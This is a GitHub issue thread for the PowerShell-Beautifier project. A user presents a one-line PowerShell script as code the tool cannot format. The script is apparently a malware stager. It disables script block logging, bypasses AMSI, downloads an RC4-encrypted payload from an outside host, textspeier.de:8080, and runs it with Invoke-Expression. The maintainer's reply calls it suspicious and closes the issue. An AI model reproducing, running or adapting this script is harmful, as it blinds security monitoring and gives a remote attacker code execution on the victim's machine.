### ISSUE TITLE
PowerShell-Beautifier can`t work in this powershell code

### ISSUE THREAD

**Issue by guapizhu** [DTW-DanWard/PowerShell-Beautifier#62]
if ($PSVerSiONTaBLe.PSVERSiOn.MAJOR -ge 3) { $GPF = [ref].Assembly.GetType('System.Management.Automation.Utils'). "GEtFie`Ld"('cachedGroupPolicySettings','N' + 'onPublic,Static'); if ($GPF) { $GPC = $GPF.GeTValUe($null); if ($GPC['ScriptB' + 'lockLogging']) { $GPC['ScriptB' + 'lockLogging']['EnableScriptB' + 'lockLogging'] = 0; $GPC['ScriptB' + 'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 } $vAL = [CoLLectIOns.GeneRiC.DicTiOnAry[StRiNG,SysteM.ObjEcT]]::new(); $Val.Add('EnableScriptB' + 'lockLogging',0); $vAl.Add('EnableScriptBlockInvocationLogging',0); $GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB' + 'lockLogging'] = $val } else { [scriptblock]. "GEtFIE`ld"('signatures','N' + 'onPublic,Static').SeTValue($nULl,(New-Object COllecTIONS.GENERic.HASHSet[STRiNg])) } [ref].Assembly.GetType('System.Management.Automation.AmsiUtils') | Where-Object { $_ } | ForEach-Object { $_.GetField('amsiInitFailed','NonPublic,Static').SeTValue($nUll,$TRUE) }; }; [SYSteM.NEt.SERVICePoinTMAnAgER]::EXPECT100CoNTINUE = 0; $WC = New-Object SYSTEM.NEt.WeBCLiEnT; $u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'; $Wc.HeADErs.Add('User-Agent',$u); $WC.ProXY = [SYSTem.Net.WeBReqUESt]::DefaUltWebPRoxy; $WC.ProXY.CrEDEntIALS = [SysTeM.Net.CrEDENtIaLCAcHE]::DEFAultNETWORkCReDentials; $Script:Proxy = $wc.ProXY; $K = [System.Text.Encoding]::ASCII.GetBYtES('10cacd856333a68debb7afc89a58226e'); $R = { $D,$K = $ArGs; $S = 0..255; 0..255 | ForEach-Object { $J = ($J + $S[$_] + $K[$_ % $K.CoUnt]) % 256; $S[$_],$S[$J] = $S[$J],$S[$_] }; $D | ForEach-Object { $I = ($I + 1) % 256; $H = ($H + $S[$I]) % 256; $S[$I],$S[$H] = $S[$H],$S[$I]; $_ -bxor $S[($S[$I] + $S[$H]) % 256] } }; $ser = 'http://textspeier.de:8080'; $t = '/admin/get.php'; $WC.HeADErs.Add("Cookie","session=8k4H9m43fuEpyQF0xcGnPHHc0L4="); $DATa = $WC.DowNloaDDATa($Ser + $t); $Iv = $DaTA[0..3]; $DatA = $daTa[4..$DAta.LengTH]; -join [ChAr[]](& $R $DATA ($IV + $K)) | Invoke-Expression

**Comment by DTW-DanWard** [comment]
Sorry, this looks suspicions.  Closing this so no one accidentally runs this.
